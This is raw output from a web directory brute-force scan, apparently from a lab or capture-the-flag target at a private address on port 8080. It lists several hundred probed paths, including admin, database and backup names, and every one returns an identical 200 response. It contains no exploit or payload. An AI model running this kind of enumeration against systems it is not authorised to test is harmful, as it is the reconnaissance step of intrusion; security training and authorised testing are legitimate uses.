200      GET       46l      151w     1478c http://10.129.234.59:8080/ufo
200      GET       46l      151w     1478c http://10.129.234.59:8080/uf
200      GET       46l      151w     1478c http://10.129.234.59:8080/unsorted
200      GET       46l      151w     1478c http://10.129.234.59:8080/www3
200      GET       46l      151w     1478c http://10.129.234.59:8080/wsop
200      GET       46l      151w     1478c http://10.129.234.59:8080/wwwlog
200      GET       46l      151w     1478c http://10.129.234.59:8080/wv
200      GET       46l      151w     1478c http://10.129.234.59:8080/196
200      GET       46l      151w     1478c http://10.129.234.59:8080/212
200      GET       46l      151w     1478c http://10.129.234.59:8080/208
200      GET       46l      151w     1478c http://10.129.234.59:8080/254
200      GET       46l      151w     1478c http://10.129.234.59:8080/249
200      GET       46l      151w     1478c http://10.129.234.59:8080/230
200      GET       46l      151w     1478c http://10.129.234.59:8080/255
200      GET       46l      151w     1478c http://10.129.234.59:8080/291
200      GET       46l      151w     1478c http://10.129.234.59:8080/295
200      GET       46l      151w     1478c http://10.129.234.59:8080/314
200      GET       46l      151w     1478c http://10.129.234.59:8080/346
200      GET       46l      151w     1478c http://10.129.234.59:8080/406
200      GET       46l      151w     1478c http://10.129.234.59:8080/516
200      GET       46l      151w     1478c http://10.129.234.59:8080/530
200      GET       46l      151w     1478c http://10.129.234.59:8080/832
200      GET       46l      151w     1478c http://10.129.234.59:8080/834
200      GET       46l      151w     1478c http://10.129.234.59:8080/820
200      GET       46l      151w     1478c http://10.129.234.59:8080/853
200      GET       46l      151w     1478c http://10.129.234.59:8080/855
200      GET       46l      151w     1478c http://10.129.234.59:8080/888
200      GET       46l      151w     1478c http://10.129.234.59:8080/897
200      GET       46l      151w     1478c http://10.129.234.59:8080/merseyshop
200      GET       46l      151w     1478c http://10.129.234.59:8080/followers
200      GET       46l      151w     1478c http://10.129.234.59:8080/!images
200      GET       46l      151w     1478c http://10.129.234.59:8080/!_images
200      GET       46l      151w     1478c http://10.129.234.59:8080/virtual-shop
200      GET       46l      151w     1478c http://10.129.234.59:8080/2co
200      GET       46l      151w     1478c http://10.129.234.59:8080/386
200      GET       46l      151w     1478c http://10.129.234.59:8080/Airplanes
200      GET       46l      151w     1478c http://10.129.234.59:8080/Aktuell
200      GET       46l      151w     1478c http://10.129.234.59:8080/Analytics
200      GET       46l      151w     1478c http://10.129.234.59:8080/Arkansas
200      GET       46l      151w     1478c http://10.129.234.59:8080/Association
200      GET       46l      151w     1478c http://10.129.234.59:8080/Aquariums
200      GET       46l      151w     1478c http://10.129.234.59:8080/Article-A-La-Une
200      GET       46l      151w     1478c http://10.129.234.59:8080/Ask
200      GET       46l      151w     1478c http://10.129.234.59:8080/AuthFiles
200      GET       46l      151w     1478c http://10.129.234.59:8080/Area51
200      GET       46l      151w     1478c http://10.129.234.59:8080/B2C
200      GET       46l      151w     1478c http://10.129.234.59:8080/Auftritte
200      GET       46l      151w     1478c http://10.129.234.59:8080/BF
200      GET       46l      151w     1478c http://10.129.234.59:8080/BSMART
200      GET       46l      151w     1478c http://10.129.234.59:8080/BannerManager
200      GET       46l      151w     1478c http://10.129.234.59:8080/CDS
200      GET       46l      151w     1478c http://10.129.234.59:8080/COM
200      GET       46l      151w     1478c http://10.129.234.59:8080/CGI_BIN
200      GET       46l      151w     1478c http://10.129.234.59:8080/CFAppMan
200      GET       46l      151w     1478c http://10.129.234.59:8080/Cal
200      GET       46l      151w     1478c http://10.129.234.59:8080/California
200      GET       46l      151w     1478c http://10.129.234.59:8080/Certification
200      GET       46l      151w     1478c http://10.129.234.59:8080/DP
200      GET       46l      151w     1478c http://10.129.234.59:8080/Dept
200      GET       46l      151w     1478c http://10.129.234.59:8080/Discover
200      GET       46l      151w     1478c http://10.129.234.59:8080/Eng
200      GET       46l      151w     1478c http://10.129.234.59:8080/Extensions
200      GET       46l      151w     1478c http://10.129.234.59:8080/Humor
200      GET       46l      151w     1478c http://10.129.234.59:8080/HumanResources
200      GET       46l      151w     1478c http://10.129.234.59:8080/IBS
200      GET       46l      151w     1478c http://10.129.234.59:8080/INLCUDES
200      GET       46l      151w     1478c http://10.129.234.59:8080/KO-KR
200      GET       46l      151w     1478c http://10.129.234.59:8080/LV
200      GET       46l      151w     1478c http://10.129.234.59:8080/Lasso
200      GET       46l      151w     1478c http://10.129.234.59:8080/LinkClick
200      GET       46l      151w     1478c http://10.129.234.59:8080/ListUse
200      GET       46l      151w     1478c http://10.129.234.59:8080/Literature
200      GET       46l      151w     1478c http://10.129.234.59:8080/Maint
200      GET       46l      151w     1478c http://10.129.234.59:8080/Mike
200      GET       46l      151w     1478c http://10.129.234.59:8080/Members_List
200      GET       46l      151w     1478c http://10.129.234.59:8080/Membre
200      GET       46l      151w     1478c http://10.129.234.59:8080/Microsite
200      GET       46l      151w     1478c http://10.129.234.59:8080/Miva
200      GET       46l      151w     1478c http://10.129.234.59:8080/Moldinthehome
200      GET       46l      151w     1478c http://10.129.234.59:8080/OA
200      GET       46l      151w     1478c http://10.129.234.59:8080/OCR
200      GET       46l      151w     1478c http://10.129.234.59:8080/TDS
200      GET       46l      151w     1478c http://10.129.234.59:8080/Planned%20Giving
200      GET       46l      151w     1478c http://10.129.234.59:8080/Places
200      GET       46l      151w     1478c http://10.129.234.59:8080/PhpMyAdmin
200      GET       46l      151w     1478c http://10.129.234.59:8080/PlumbingIssues
200      GET       46l      151w     1478c http://10.129.234.59:8080/Podcasts
200      GET       46l      151w     1478c http://10.129.234.59:8080/President
200      GET       46l      151w     1478c http://10.129.234.59:8080/Presse
200      GET       46l      151w     1478c http://10.129.234.59:8080/Press%20Releases
200      GET       46l      151w     1478c http://10.129.234.59:8080/PressRoom
200      GET       46l      151w     1478c http://10.129.234.59:8080/SANDBOX
200      GET       46l      151w     1478c http://10.129.234.59:8080/Shop20
200      GET       46l      151w     1478c http://10.129.234.59:8080/Shortcut
200      GET       46l      151w     1478c http://10.129.234.59:8080/Shop19
200      GET       46l      151w     1478c http://10.129.234.59:8080/Shop18
200      GET       46l      151w     1478c http://10.129.234.59:8080/Site_Map
200      GET       46l      151w     1478c http://10.129.234.59:8080/Sitemanager
200      GET       46l      151w     1478c http://10.129.234.59:8080/Thumbs
200      GET       46l      151w     1478c http://10.129.234.59:8080/WebSiphon
200      GET       46l      151w     1478c http://10.129.234.59:8080/WebTeam
200      GET       46l      151w     1478c http://10.129.234.59:8080/WebTrends
200      GET       46l      151w     1478c http://10.129.234.59:8080/Woodworking
200      GET       46l      151w     1478c http://10.129.234.59:8080/WordPress
200      GET       46l      151w     1478c http://10.129.234.59:8080/_public
200      GET       46l      151w     1478c http://10.129.234.59:8080/acquisitions
200      GET       46l      151w     1478c http://10.129.234.59:8080/adminzone
200      GET       46l      151w     1478c http://10.129.234.59:8080/advising
200      GET       46l      151w     1478c http://10.129.234.59:8080/altads
200      GET       46l      151w     1478c http://10.129.234.59:8080/almanac
200      GET       46l      151w     1478c http://10.129.234.59:8080/axroi
200      GET       46l      151w     1478c http://10.129.234.59:8080/bidding
200      GET       46l      151w     1478c http://10.129.234.59:8080/css-styles
200      GET       46l      151w     1478c http://10.129.234.59:8080/eggs
200      GET       46l      151w     1478c http://10.129.234.59:8080/heinz
200      GET       46l      151w     1478c http://10.129.234.59:8080/hp1
200      GET       46l      151w     1478c http://10.129.234.59:8080/hotufi2
200      GET       46l      151w     1478c http://10.129.234.59:8080/houseads
200      GET       46l      151w     1478c http://10.129.234.59:8080/hours
200      GET       46l      151w     1478c http://10.129.234.59:8080/hterrors
200      GET       46l      151w     1478c http://10.129.234.59:8080/imr
200      GET       46l      151w     1478c http://10.129.234.59:8080/jan
200      GET       46l      151w     1478c http://10.129.234.59:8080/lar
200      GET       46l      151w     1478c http://10.129.234.59:8080/laredo
200      GET       46l      151w     1478c http://10.129.234.59:8080/las-vegas
200      GET       46l      151w     1478c http://10.129.234.59:8080/lawrence
200      GET       46l      151w     1478c http://10.129.234.59:8080/live_published
200      GET       46l      151w     1478c http://10.129.234.59:8080/nelson
200      GET       46l      151w     1478c http://10.129.234.59:8080/oldstore
200      GET       46l      151w     1478c http://10.129.234.59:8080/ose
200      GET       46l      151w     1478c http://10.129.234.59:8080/osp
200      GET       46l      151w     1478c http://10.129.234.59:8080/phpodp
200      GET       46l      151w     1478c http://10.129.234.59:8080/recht
200      GET       46l      151w     1478c http://10.129.234.59:8080/sem2
200      GET       46l      151w     1478c http://10.129.234.59:8080/siterefer
200      GET       46l      151w     1478c http://10.129.234.59:8080/supervisor
200      GET       46l      151w     1478c http://10.129.234.59:8080/sur
200      GET       46l      151w     1478c http://10.129.234.59:8080/surveyresults
200      GET       46l      151w     1478c http://10.129.234.59:8080/surgeons
200      GET       46l      151w     1478c http://10.129.234.59:8080/tradeshow
200      GET       46l      151w     1478c http://10.129.234.59:8080/tuxwebmail
200      GET       46l      151w     1478c http://10.129.234.59:8080/810
200      GET       46l      151w     1478c http://10.129.234.59:8080/815
200      GET       46l      151w     1478c http://10.129.234.59:8080/812
200      GET       46l      151w     1478c http://10.129.234.59:8080/813
200      GET       46l      151w     1478c http://10.129.234.59:8080/816
200      GET       46l      151w     1478c http://10.129.234.59:8080/839
200      GET       46l      151w     1478c http://10.129.234.59:8080/10001
200      GET       46l      151w     1478c http://10.129.234.59:8080/640
200      GET       46l      151w     1478c http://10.129.234.59:8080/666
200      GET       46l      151w     1478c http://10.129.234.59:8080/633
200      GET       46l      151w     1478c http://10.129.234.59:8080/AddIns
200      GET       46l      151w     1478c http://10.129.234.59:8080/AddToBasket
200      GET       46l      151w     1478c http://10.129.234.59:8080/BKUP
200      GET       46l      151w     1478c http://10.129.234.59:8080/CORPORATE
200      GET       46l      151w     1478c http://10.129.234.59:8080/CRM2
200      GET       46l      151w     1478c http://10.129.234.59:8080/CustomError
200      GET       46l      151w     1478c http://10.129.234.59:8080/Discount
200      GET       46l      151w     1478c http://10.129.234.59:8080/Display
200      GET       46l      151w     1478c http://10.129.234.59:8080/Emoticons
200      GET       46l      151w     1478c http://10.129.234.59:8080/Err
200      GET       46l      151w     1478c http://10.129.234.59:8080/Equipment
200      GET       46l      151w     1478c http://10.129.234.59:8080/FL
200      GET       46l      151w     1478c http://10.129.234.59:8080/FORMgen
200      GET       46l      151w     1478c http://10.129.234.59:8080/Infobridge
200      GET       46l      151w     1478c http://10.129.234.59:8080/Intercom
200      GET       46l      151w     1478c http://10.129.234.59:8080/Jordan
200      GET       46l      151w     1478c http://10.129.234.59:8080/KM
200      GET       46l      151w     1478c http://10.129.234.59:8080/KK
200      GET       46l      151w     1478c http://10.129.234.59:8080/Latest
200      GET       46l      151w     1478c http://10.129.234.59:8080/META
200      GET       46l      151w     1478c http://10.129.234.59:8080/MemberCenter
200      GET       46l      151w     1478c http://10.129.234.59:8080/Naughty
200      GET       46l      151w     1478c http://10.129.234.59:8080/Navi
200      GET       46l      151w     1478c http://10.129.234.59:8080/Nav_Admin
200      GET       46l      151w     1478c http://10.129.234.59:8080/Nebraska
200      GET       46l      151w     1478c http://10.129.234.59:8080/OF
200      GET       46l      151w     1478c http://10.129.234.59:8080/OnTV
200      GET       46l      151w     1478c http://10.129.234.59:8080/OnlineServices
200      GET       46l      151w     1478c http://10.129.234.59:8080/Paul
200      GET       46l      151w     1478c http://10.129.234.59:8080/SBS
200      GET       46l      151w     1478c http://10.129.234.59:8080/SelectSurvey
200      GET       46l      151w     1478c http://10.129.234.59:8080/SocialShare
200      GET       46l      151w     1478c http://10.129.234.59:8080/SmarterTicket
200      GET       46l      151w     1478c http://10.129.234.59:8080/Studio
200      GET       46l      151w     1478c http://10.129.234.59:8080/UnitTests
200      GET       46l      151w     1478c http://10.129.234.59:8080/Women
200      GET       46l      151w     1478c http://10.129.234.59:8080/_StyleSheets
200      GET       46l      151w     1478c http://10.129.234.59:8080/_contents
200      GET       46l      151w     1478c http://10.129.234.59:8080/_errorpages
200      GET       46l      151w     1478c http://10.129.234.59:8080/_mailer
200      GET       46l      151w     1478c http://10.129.234.59:8080/_languages
200      GET       46l      151w     1478c http://10.129.234.59:8080/_notused
200      GET       46l      151w     1478c http://10.129.234.59:8080/_sounds
200      GET       46l      151w     1478c http://10.129.234.59:8080/_skin
200      GET       46l      151w     1478c http://10.129.234.59:8080/_teaser
200      GET       46l      151w     1478c http://10.129.234.59:8080/_verity
200      GET       46l      151w     1478c http://10.129.234.59:8080/_view
200      GET       46l      151w     1478c http://10.129.234.59:8080/_vt_bin
200      GET       46l      151w     1478c http://10.129.234.59:8080/_wip
200      GET       46l      151w     1478c http://10.129.234.59:8080/_www
200      GET       46l      151w     1478c http://10.129.234.59:8080/a-propos-du-csm
200      GET       46l      151w     1478c http://10.129.234.59:8080/academie
200      GET       46l      151w     1478c http://10.129.234.59:8080/account-settings
200      GET       46l      151w     1478c http://10.129.234.59:8080/actrade
200      GET       46l      151w     1478c http://10.129.234.59:8080/ad_catalog
200      GET       46l      151w     1478c http://10.129.234.59:8080/add_venue
200      GET       46l      151w     1478c http://10.129.234.59:8080/addaia
200      GET       46l      151w     1478c http://10.129.234.59:8080/adminnews
200      GET       46l      151w     1478c http://10.129.234.59:8080/adminpage
200      GET       46l      151w     1478c http://10.129.234.59:8080/adtracker
200      GET       46l      151w     1478c http://10.129.234.59:8080/adtran
200      GET       46l      151w     1478c http://10.129.234.59:8080/affiliazione
200      GET       46l      151w     1478c http://10.129.234.59:8080/afflinks
200      GET       46l      151w     1478c http://10.129.234.59:8080/affs
200      GET       46l      151w     1478c http://10.129.234.59:8080/afl
200      GET       46l      151w     1478c http://10.129.234.59:8080/ajaxed
200      GET       46l      151w     1478c http://10.129.234.59:8080/alboxtaberno
200      GET       46l      151w     1478c http://10.129.234.59:8080/almudaina
200      GET       46l      151w     1478c http://10.129.234.59:8080/anleitungen
200      GET       46l      151w     1478c http://10.129.234.59:8080/aow
200      GET       46l      151w     1478c http://10.129.234.59:8080/apoyo
200      GET       46l      151w     1478c http://10.129.234.59:8080/applicants
200      GET       46l      151w     1478c http://10.129.234.59:8080/apply_resume
200      GET       46l      151w     1478c http://10.129.234.59:8080/arredamento
200      GET       46l      151w     1478c http://10.129.234.59:8080/asco
200      GET       46l      151w     1478c http://10.129.234.59:8080/aspdotnet
200      GET       46l      151w     1478c http://10.129.234.59:8080/aspdb
200      GET       46l      151w     1478c http://10.129.234.59:8080/authorpics
200      GET       46l      151w     1478c http://10.129.234.59:8080/automne_bin
200      GET       46l      151w     1478c http://10.129.234.59:8080/countrypairs
200      GET       46l      151w     1478c http://10.129.234.59:8080/flashcards
200      GET       46l      151w     1478c http://10.129.234.59:8080/backupindex
200      GET       46l      151w     1478c http://10.129.234.59:8080/bang
200      GET       46l      151w     1478c http://10.129.234.59:8080/beliefs
200      GET       46l      151w     1478c http://10.129.234.59:8080/billy
200      GET       46l      151w     1478c http://10.129.234.59:8080/bim
200      GET       46l      151w     1478c http://10.129.234.59:8080/bitar
200      GET       46l      151w     1478c http://10.129.234.59:8080/bit
200      GET       46l      151w     1478c http://10.129.234.59:8080/blackbox
200      GET       46l      151w     1478c http://10.129.234.59:8080/blackout
200      GET       46l      151w     1478c http://10.129.234.59:8080/blaetterkatalog
200      GET       46l      151w     1478c http://10.129.234.59:8080/blake
200      GET       46l      151w     1478c http://10.129.234.59:8080/bonsai
200      GET       46l      151w     1478c http://10.129.234.59:8080/brides
200      GET       46l      151w     1478c http://10.129.234.59:8080/bricolage
200      GET       46l      151w     1478c http://10.129.234.59:8080/bricks
200      GET       46l      151w     1478c http://10.129.234.59:8080/brief
200      GET       46l      151w     1478c http://10.129.234.59:8080/brother
200      GET       46l      151w     1478c http://10.129.234.59:8080/bullseye
200      GET       46l      151w     1478c http://10.129.234.59:8080/calamillor
200      GET       46l      151w     1478c http://10.129.234.59:8080/calamurada
200      GET       46l      151w     1478c http://10.129.234.59:8080/campanha
200      GET       46l      151w     1478c http://10.129.234.59:8080/candidatos
200      GET       46l      151w     1478c http://10.129.234.59:8080/candles
200      GET       46l      151w     1478c http://10.129.234.59:8080/canetmar
200      GET       46l      151w     1478c http://10.129.234.59:8080/causes
200      GET       46l      151w     1478c http://10.129.234.59:8080/ncommerce3
200      GET       46l      151w     1478c http://10.129.234.59:8080/mte
200      GET       46l      151w     1478c http://10.129.234.59:8080/htsearch
200      GET       46l      151w     1478c http://10.129.234.59:8080/cgiproxy
200      GET       46l      151w     1478c http://10.129.234.59:8080/client_sites
200      GET       46l      151w     1478c http://10.129.234.59:8080/clientftp
200      GET       46l      151w     1478c http://10.129.234.59:8080/clientsarea
200      GET       46l      151w     1478c http://10.129.234.59:8080/clientservices
200      GET       46l      151w     1478c http://10.129.234.59:8080/cnews
200      GET       46l      151w     1478c http://10.129.234.59:8080/cnn
200      GET       46l      151w     1478c http://10.129.234.59:8080/cnn_adspaces
200      GET       46l      151w     1478c http://10.129.234.59:8080/cobalt-images
200      GET       46l      151w     1478c http://10.129.234.59:8080/comunicados
200      GET       46l      151w     1478c http://10.129.234.59:8080/cpo
200      GET       46l      151w     1478c http://10.129.234.59:8080/great_britain
200      GET       46l      151w     1478c http://10.129.234.59:8080/cslh
200      GET       46l      151w     1478c http://10.129.234.59:8080/dbox
200      GET       46l      151w     1478c http://10.129.234.59:8080/dbms
200      GET       46l      151w     1478c http://10.129.234.59:8080/dblist
200      GET       46l      151w     1478c http://10.129.234.59:8080/dbtools
200      GET       46l      151w     1478c http://10.129.234.59:8080/dbmanager
200      GET       46l      151w     1478c http://10.129.234.59:8080/didyouknow
200      GET       46l      151w     1478c http://10.129.234.59:8080/dint
200      GET       46l      151w     1478c http://10.129.234.59:8080/dir-catalogue
200      GET       46l      151w     1478c http://10.129.234.59:8080/dml
200      GET       46l      151w     1478c http://10.129.234.59:8080/dnl
200      GET       46l      151w     1478c http://10.129.234.59:8080/dropoff
200      GET       46l      151w     1478c http://10.129.234.59:8080/drops
200      GET       46l      151w     1478c http://10.129.234.59:8080/duplicate1
200      GET       46l      151w     1478c http://10.129.234.59:8080/dynabooking
200      GET       46l      151w     1478c http://10.129.234.59:8080/dynamicdata
200      GET       46l      151w     1478c http://10.129.234.59:8080/e-pubs
200      GET       46l      151w     1478c http://10.129.234.59:8080/eComm
200      GET       46l      151w     1478c http://10.129.234.59:8080/eRoute
200      GET       46l      151w     1478c http://10.129.234.59:8080/egreetings
200      GET       46l      151w     1478c http://10.129.234.59:8080/ema
200      GET       46l      151w     1478c http://10.129.234.59:8080/elspoblets
200      GET       46l      151w     1478c http://10.129.234.59:8080/emailaddresses
200      GET       46l      151w     1478c http://10.129.234.59:8080/emailadmin
200      GET       46l      151w     1478c http://10.129.234.59:8080/empuiabrava
200      GET       46l      151w     1478c http://10.129.234.59:8080/en-ie
200      GET       46l      151w     1478c http://10.129.234.59:8080/encryption
200      GET       46l      151w     1478c http://10.129.234.59:8080/encoded
200      GET       46l      151w     1478c http://10.129.234.59:8080/endirect
200      GET       46l      151w     1478c http://10.129.234.59:8080/knowsley-council
200      GET       46l      151w     1478c http://10.129.234.59:8080/environments
200      GET       46l      151w     1478c http://10.129.234.59:8080/ericsson
200      GET       46l      151w     1478c http://10.129.234.59:8080/espresso
200      GET       46l      151w     1478c http://10.129.234.59:8080/eternal
200      GET       46l      151w     1478c http://10.129.234.59:8080/etd
200      GET       46l      151w     1478c http://10.129.234.59:8080/etest
200      GET       46l      151w     1478c http://10.129.234.59:8080/eurostar
200      GET       46l      151w     1478c http://10.129.234.59:8080/examreview
200      GET       46l      151w     1478c http://10.129.234.59:8080/example4
200      GET       46l      151w     1478c http://10.129.234.59:8080/exbal
200      GET       46l      151w     1478c http://10.129.234.59:8080/excelsior
200      GET       46l      151w     1478c http://10.129.234.59:8080/exeter
200      GET       46l      151w     1478c http://10.129.234.59:8080/exemplos
200      GET       46l      151w     1478c http://10.129.234.59:8080/fb-connect
200      GET       46l      151w     1478c http://10.129.234.59:8080/fbga
200      GET       46l      151w     1478c http://10.129.234.59:8080/fbi
200      GET       46l      151w     1478c http://10.129.234.59:8080/ferienhauser
200      GET       46l      151w     1478c http://10.129.234.59:8080/fernsehen
200      GET       46l      151w     1478c http://10.129.234.59:8080/figures
200      GET       46l      151w     1478c http://10.129.234.59:8080/fijos
200      GET       46l      151w     1478c http://10.129.234.59:8080/fiji
200      GET       46l      151w     1478c http://10.129.234.59:8080/firehouse
200      GET       46l      151w     1478c http://10.129.234.59:8080/fiscal
200      GET       46l      151w     1478c http://10.129.234.59:8080/footage
200      GET       46l      151w     1478c http://10.129.234.59:8080/foosun
200      GET       46l      151w     1478c http://10.129.234.59:8080/footerlinks
200      GET       46l      151w     1478c http://10.129.234.59:8080/foreSee
200      GET       46l      151w     1478c http://10.129.234.59:8080/visubox
200      GET       46l      151w     1478c http://10.129.234.59:8080/user_email_gfx
200      GET       46l      151w     1478c http://10.129.234.59:8080/forumse
200      GET       46l      151w     1478c http://10.129.234.59:8080/forumss
200      GET       46l      151w     1478c http://10.129.234.59:8080/free-top-picks
200      GET       46l      151w     1478c http://10.129.234.59:8080/freebie
200      GET       46l      151w     1478c http://10.129.234.59:8080/freeforum
200      GET       46l      151w     1478c http://10.129.234.59:8080/freelinking
200      GET       46l      151w     1478c http://10.129.234.59:8080/freebooks
200      GET       46l      151w     1478c http://10.129.234.59:8080/freesms
200      GET       46l      151w     1478c http://10.129.234.59:8080/freizeit-hobby
200      GET       46l      151w     1478c http://10.129.234.59:8080/friendship
200      GET       46l      151w     1478c http://10.129.234.59:8080/fto
200      GET       46l      151w     1478c http://10.129.234.59:8080/funct
200      GET       46l      151w     1478c http://10.129.234.59:8080/funny_pictures
200      GET       46l      151w     1478c http://10.129.234.59:8080/gcenter
200      GET       46l      151w     1478c http://10.129.234.59:8080/gened
200      GET       46l      151w     1478c http://10.129.234.59:8080/gol
200      GET       46l      151w     1478c http://10.129.234.59:8080/gonf
200      GET       46l      151w     1478c http://10.129.234.59:8080/googleCheckout
200      GET       46l      151w     1478c http://10.129.234.59:8080/google_adsense
200      GET       46l      151w     1478c http://10.129.234.59:8080/ssop
200      GET       46l      151w     1478c http://10.129.234.59:8080/slredirect
200      GET       46l      151w     1478c http://10.129.234.59:8080/grb
200      GET       46l      151w     1478c http://10.129.234.59:8080/grf
200      GET       46l      151w     1478c http://10.129.234.59:8080/indiedb
200      GET       46l      151w     1478c http://10.129.234.59:8080/guestb
200      GET       46l      151w     1478c http://10.129.234.59:8080/guestbook-zzz
200      GET       46l      151w     1478c http://10.129.234.59:8080/himg
200      GET       46l      151w     1478c http://10.129.234.59:8080/home-old
200      GET       46l      151w     1478c http://10.129.234.59:8080/http_error
200      GET       46l      151w     1478c http://10.129.234.59:8080/ib-de
200      GET       46l      151w     1478c http://10.129.234.59:8080/ibk
200      GET       46l      151w     1478c http://10.129.234.59:8080/ibo
200      GET       46l      151w     1478c http://10.129.234.59:8080/ibo-de
200      GET       46l      151w     1478c http://10.129.234.59:8080/ibox
200      GET       46l      151w     1478c http://10.129.234.59:8080/idioma
200      GET       46l      151w     1478c http://10.129.234.59:8080/idg
200      GET       46l      151w     1478c http://10.129.234.59:8080/imagenscbe
200      GET       46l      151w     1478c http://10.129.234.59:8080/inb
200      GET       46l      151w     1478c http://10.129.234.59:8080/incident
200      GET       46l      151w     1478c http://10.129.234.59:8080/incls
200      GET       46l      151w     1478c http://10.129.234.59:8080/incall
200      GET       46l      151w     1478c http://10.129.234.59:8080/insta
200      GET       46l      151w     1478c http://10.129.234.59:8080/instruments
200      GET       46l      151w     1478c http://10.129.234.59:8080/ishopWebFront
200      GET       46l      151w     1478c http://10.129.234.59:8080/islem
200      GET       46l      151w     1478c http://10.129.234.59:8080/jcadmin
200      GET       46l      151w     1478c http://10.129.234.59:8080/jg
200      GET       46l      151w     1478c http://10.129.234.59:8080/jochen
200      GET       46l      151w     1478c http://10.129.234.59:8080/talentnetwork
200      GET       46l      151w     1478c http://10.129.234.59:8080/jori
200      GET       46l      151w     1478c http://10.129.234.59:8080/jscs
200      GET       46l      151w     1478c http://10.129.234.59:8080/jsincludes
200      GET       46l      151w     1478c http://10.129.234.59:8080/jsmenu
200      GET       46l      151w     1478c http://10.129.234.59:8080/k3soft
200      GET       46l      151w     1478c http://10.129.234.59:8080/kaart
200      GET       46l      151w     1478c http://10.129.234.59:8080/kimg
200      GET       46l      151w     1478c http://10.129.234.59:8080/kinaievek
200      GET       46l      151w     1478c http://10.129.234.59:8080/knots
200      GET       46l      151w     1478c http://10.129.234.59:8080/kontrollpanel
200      GET       46l      151w     1478c http://10.129.234.59:8080/kuenstler
200      GET       46l      151w     1478c http://10.129.234.59:8080/kyoto
200      GET       46l      151w     1478c http://10.129.234.59:8080/laheta
200      GET       46l      151w     1478c http://10.129.234.59:8080/lancaster
200      GET       46l      151w     1478c http://10.129.234.59:8080/lampolla
200      GET       46l      151w     1478c http://10.129.234.59:8080/lamps
200      GET       46l      151w     1478c http://10.129.234.59:8080/lch
200      GET       46l      151w     1478c http://10.129.234.59:8080/lgsl
200      GET       46l      151w     1478c http://10.129.234.59:8080/pet-parade
200      GET       46l      151w     1478c http://10.129.234.59:8080/lifestyle-news
200      GET       46l      151w     1478c http://10.129.234.59:8080/lili
200      GET       46l      151w     1478c http://10.129.234.59:8080/liguria
200      GET       46l      151w     1478c http://10.129.234.59:8080/linbot
200      GET       46l      151w     1478c http://10.129.234.59:8080/loginpage
200      GET       46l      151w     1478c http://10.129.234.59:8080/aplicacao
200      GET       46l      151w     1478c http://10.129.234.59:8080/aplicacao_espec
200      GET       46l      151w     1478c http://10.129.234.59:8080/lwt
200      GET       46l      151w     1478c http://10.129.234.59:8080/lxr
200      GET       46l      151w     1478c http://10.129.234.59:8080/mad
200      GET       46l      151w     1478c http://10.129.234.59:8080/magadan
200      GET       46l      151w     1478c http://10.129.234.59:8080/mailouts
200      GET       46l      151w     1478c http://10.129.234.59:8080/mallar
200      GET       46l      151w     1478c http://10.129.234.59:8080/mask
200      GET       46l      151w     1478c http://10.129.234.59:8080/masterdata
200      GET       46l      151w     1478c http://10.129.234.59:8080/mdp
200      GET       46l      151w     1478c http://10.129.234.59:8080/medano
200      GET       46l      151w     1478c http://10.129.234.59:8080/media-room
200      GET       46l      151w     1478c http://10.129.234.59:8080/melanie
200      GET       46l      151w     1478c http://10.129.234.59:8080/meirong
200      GET       46l      151w     1478c http://10.129.234.59:8080/member_files
200      GET       46l      151w     1478c http://10.129.234.59:8080/membersite
200      GET       46l      151w     1478c http://10.129.234.59:8080/mems
200      GET       46l      151w     1478c http://10.129.234.59:8080/mfa
200      GET       46l      151w     1478c http://10.129.234.59:8080/michel
200      GET       46l      151w     1478c http://10.129.234.59:8080/michele
200      GET       46l      151w     1478c http://10.129.234.59:8080/midland
200      GET       46l      151w     1478c http://10.129.234.59:8080/misc_management
200      GET       46l      151w     1478c http://10.129.234.59:8080/mojacarplaya
200      GET       46l      151w     1478c http://10.129.234.59:8080/mrm
200      GET       46l      151w     1478c http://10.129.234.59:8080/mrtg2
200      GET       46l      151w     1478c http://10.129.234.59:8080/murla
200      GET       46l      151w     1478c http://10.129.234.59:8080/mutxamel
200      GET       46l      151w     1478c http://10.129.234.59:8080/muzikl
200      GET       46l      151w     1478c http://10.129.234.59:8080/mwhois
200      GET       46l      151w     1478c http://10.129.234.59:8080/myads
200      GET       46l      151w     1478c http://10.129.234.59:8080/mynews
200      GET       46l      151w     1478c http://10.129.234.59:8080/myphpfiles
200      GET       46l      151w     1478c http://10.129.234.59:8080/mysql_backup
200      GET       46l      151w     1478c http://10.129.234.59:8080/mysearch
200      GET       46l      151w     1478c http://10.129.234.59:8080/napi
200      GET       46l      151w     1478c http://10.129.234.59:8080/narcotic
200      GET       46l      151w     1478c http://10.129.234.59:8080/naron
200      GET       46l      151w     1478c http://10.129.234.59:8080/odpowiedz
200      GET       46l      151w     1478c http://10.129.234.59:8080/nepal
200      GET       46l      151w     1478c http://10.129.234.59:8080/nep
200      GET       46l      151w     1478c http://10.129.234.59:8080/nepogoda
200      GET       46l      151w     1478c http://10.129.234.59:8080/newemail
200      GET       46l      151w     1478c http://10.129.234.59:8080/newslet
200      GET       46l      151w     1478c http://10.129.234.59:8080/newsletter-files
200      GET       46l      151w     1478c http://10.129.234.59:8080/newstyle
200      GET       46l      151w     1478c http://10.129.234.59:8080/night-life
200      GET       46l      151w     1478c http://10.129.234.59:8080/nifty
200      GET       46l      151w     1478c http://10.129.234.59:8080/nobel
200      GET       46l      151w     1478c http://10.129.234.59:8080/noticiesweb
200      GET       46l      151w     1478c http://10.129.234.59:8080/olddata
200      GET       46l      151w     1478c http://10.129.234.59:8080/olivanova
200      GET       46l      151w     1478c http://10.129.234.59:8080/ome
200      GET       46l      151w     1478c http://10.129.234.59:8080/onlinereg
200      GET       46l      151w     1478c http://10.129.234.59:8080/ontinyent
200      GET       46l      151w     1478c http://10.129.234.59:8080/ostatni
200      GET       46l      151w     1478c http://10.129.234.59:8080/padul
200      GET       46l      151w     1478c http://10.129.234.59:8080/pagetools
200      GET       46l      151w     1478c http://10.129.234.59:8080/participant
200      GET       46l      151w     1478c http://10.129.234.59:8080/pax
200      GET       46l      151w     1478c http://10.129.234.59:8080/paw
200      GET       46l      151w     1478c http://10.129.234.59:8080/pear_packages
200      GET       46l      151w     1478c http://10.129.234.59:8080/personales
200      GET       46l      151w     1478c http://10.129.234.59:8080/philg
200      GET       46l      151w     1478c http://10.129.234.59:8080/phaeton
200      GET       46l      151w     1478c http://10.129.234.59:8080/phpMyAdmin-2
200      GET       46l      151w     1478c http://10.129.234.59:8080/phpbanner
200      GET       46l      151w     1478c http://10.129.234.59:8080/pitanie
200      GET       46l      151w     1478c http://10.129.234.59:8080/pixlie
200      GET       46l      151w     1478c http://10.129.234.59:8080/play-bingo
